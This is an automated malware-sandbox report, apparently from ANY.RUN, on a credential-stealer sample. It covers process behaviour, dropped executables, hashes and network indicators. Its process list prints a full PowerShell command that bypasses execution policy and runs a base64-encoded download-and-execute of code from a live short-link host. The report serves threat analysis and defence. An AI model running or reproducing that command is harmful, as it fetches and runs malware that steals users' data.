File name:

test.exe

Full analysis: https://app.any.run/tasks/c975dd9b-3369-4082-9066-9c3acbfcddd5
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: April 29, 2025, 18:53:31
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
stealer
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

098F6BCD4621D373CADE4E832627B4F6

SHA1:

A94A8FE5CCB19BA61C4C0873D391E987982FBBD3

SHA256:

9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08

SSDEEP:

3:Hn:Hn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7492)

    • Executing a file with an untrusted certificate

      • DistributedBlade58.exe (PID: 8168)
      • DistributedBlade58.exe (PID: 7304)

    • Actions looks like stealing of personal data

      • MSLauncher.exe (PID: 7288)

  • SUSPICIOUS

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 7492)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7492)
      • DistributedBlade58.exe (PID: 8168)
      • DistributedBlade58.exe (PID: 7304)

    • Starts itself from another location

      • DistributedBlade58.exe (PID: 8168)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 7492)

  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 7492)

    • Disables trace logs

      • powershell.exe (PID: 7492)

    • The executable file from the user directory is run by the Powershell process

      • DistributedBlade58.exe (PID: 8168)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7492)

    • Creates files in the program directory

      • DistributedBlade58.exe (PID: 8168)

    • Reads the computer name

      • DistributedBlade58.exe (PID: 8168)
      • 360Tray.exe (PID: 7264)
      • MSLauncher.exe (PID: 7288)
      • DistributedBlade58.exe (PID: 7304)

    • Checks supported languages

      • DistributedBlade58.exe (PID: 8168)
      • DistributedBlade58.exe (PID: 7304)
      • MSLauncher.exe (PID: 7288)
      • 360Tray.exe (PID: 7264)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 7492)

    • Creates files or folders in the user directory

      • DistributedBlade58.exe (PID: 7304)

    • Create files in a temporary directory

      • DistributedBlade58.exe (PID: 7304)
      • 360Tray.exe (PID: 7264)

    • Reads the machine GUID from the registry

      • MSLauncher.exe (PID: 7288)

    • The sample compiled with chinese language support

      • DistributedBlade58.exe (PID: 7304)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
135
Monitored processes
9
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe conhost.exe no specs sppextcomobj.exe no specs slui.exe no specs distributedblade58.exe distributedblade58.exe mslauncher.exe 360tray.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
7264"C:\Users\admin\AppData\Roaming\PoFirefox\360Tray.exe" "C:\Users\admin\AppData\Roaming\PoFirefox\360Tray.exe" /onuiC:\Users\admin\AppData\Roaming\PoFirefox\360Tray.exeDistributedBlade58.exe
User:
admin
Company:
360.cn
Integrity Level:
MEDIUM
Description:
360安全卫士 安全防护中心模块
Exit code:
0
Version:
12, 0, 0, 1761
Modules
Images
c:\windows\syswow64\input.dll
c:\users\admin\appdata\roaming\pofirefox\360tray.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
7288C:\Users\admin\AppData\Local\Temp\MSLauncher.exeC:\Users\admin\AppData\Local\Temp\MSLauncher.exe
DistributedBlade58.exe
User:
admin
Company:
Blizzard Entertainment
Integrity Level:
MEDIUM
Description:
Battle.net Launcher
Version:
2.34.0.14907
Modules
Images
c:\users\admin\appdata\local\temp\eea194.tmp
c:\users\admin\appdata\local\temp\mslauncher.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
7304C:\ProgramData\PoFirefox\DistributedBlade58.exeC:\ProgramData\PoFirefox\DistributedBlade58.exe
DistributedBlade58.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\programdata\pofirefox\distributedblade58.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
7492"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -enc KABJAG4AdgBvAGsAZQAtAHcAZQBiAHIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAJwBoAHQAdABwAHMAOgAvAC8AcwBoAG8AcgB0AGUAcgAuAG0AZQAvAFUAMgBEAEIAegAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AYwBvAG4AdABlAG4AdAAgAHwAaQBlAHgAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7500\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7704C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
7736"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
8168"C:\Users\admin\AppData\Local\Temp\Package\DistributedBlade58.exe"C:\Users\admin\AppData\Local\Temp\Package\DistributedBlade58.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\package\distributedblade58.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
Total events
5 872
Read events
5 872
Write events
0
Delete events
0

Modification events

No data
Executable files
10
Suspicious files
13
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
7492powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_21hqh5fa.hwb.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7492powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xkzfhql4.izl.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7492powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10c1bb.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
7492powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JBXXCQYXJIHWRO6AX69V.tempbinary
MD5:B63A01B62C49A86FDD2DC3152C7B424D
SHA256:764428F5EED6968E0C08B5462517C9F1567A8DF67A658382EFAFFF40479F56EB
7304DistributedBlade58.exeC:\Users\admin\AppData\Local\Temp\EEA194.tmp
MD5:
SHA256:
7492powershell.exeC:\Users\admin\AppData\Local\Temp\Package\DistributedBlade58.exeexecutable
MD5:9E90C7BA64A66D9AB4703AF006540193
SHA256:A519304C3BBA23EAE2045A85E01AAE44E6556B2F787966654B7209DB13CFA0C4
8168DistributedBlade58.exeC:\ProgramData\PoFirefox\Maik.xtbinary
MD5:ACE46038DC3BF9FB1E177950555CF701
SHA256:B7570587305E05D79B85FF769A9FD46723B68E0C7ECA2DD87AF4AC1BC6B0C6D3
7492powershell.exeC:\Users\admin\AppData\Local\Temp\Package\Klaind.xntjbinary
MD5:9E9DF19271265E7E5CB5029DFB55ED30
SHA256:4F3460ADCCB48170B0E7A47ECD1AC74654E5DC4EDB34C8759D9D5521357F98D0
8168DistributedBlade58.exeC:\ProgramData\PoFirefox\IconX.dllexecutable
MD5:D2DBDD831DDCE917D58571E0FD70A742
SHA256:0F4AF1600462AA57259FD9D935E2DBB5CA22336CF6515F4A390B04CD5DA7955F
7492powershell.exeC:\Users\admin\AppData\Local\Temp\Package\dx0.dllexecutable
MD5:693DFBB9B324E80B70660927CA1DEA69
SHA256:7C28D90E3484B566EE00ADAB4679A3D1C51F86F01560035D86C8F7788AC05234
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
22
DNS requests
15
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.16.241.19:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
668
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
668
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
2.16.241.19:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.219.150.101:80
www.microsoft.com
AKAMAI-AS
CL
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7492
powershell.exe
188.114.96.3:443
shorter.me
CLOUDFLARENET
NL
malicious
6544
svchost.exe
20.190.159.4:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 2.16.241.19
  • 2.16.241.12
whitelisted
www.microsoft.com
  • 23.219.150.101
whitelisted
google.com
  • 172.217.18.110
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
shorter.me
  • 188.114.96.3
  • 188.114.97.3
malicious
marinescoatsnow.click
  • 188.114.96.3
  • 188.114.97.3
unknown
login.live.com
  • 20.190.159.4
  • 40.126.31.73
  • 40.126.31.129
  • 20.190.159.71
  • 40.126.31.128
  • 20.190.159.130
  • 20.190.159.0
  • 40.126.31.67
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
test.exe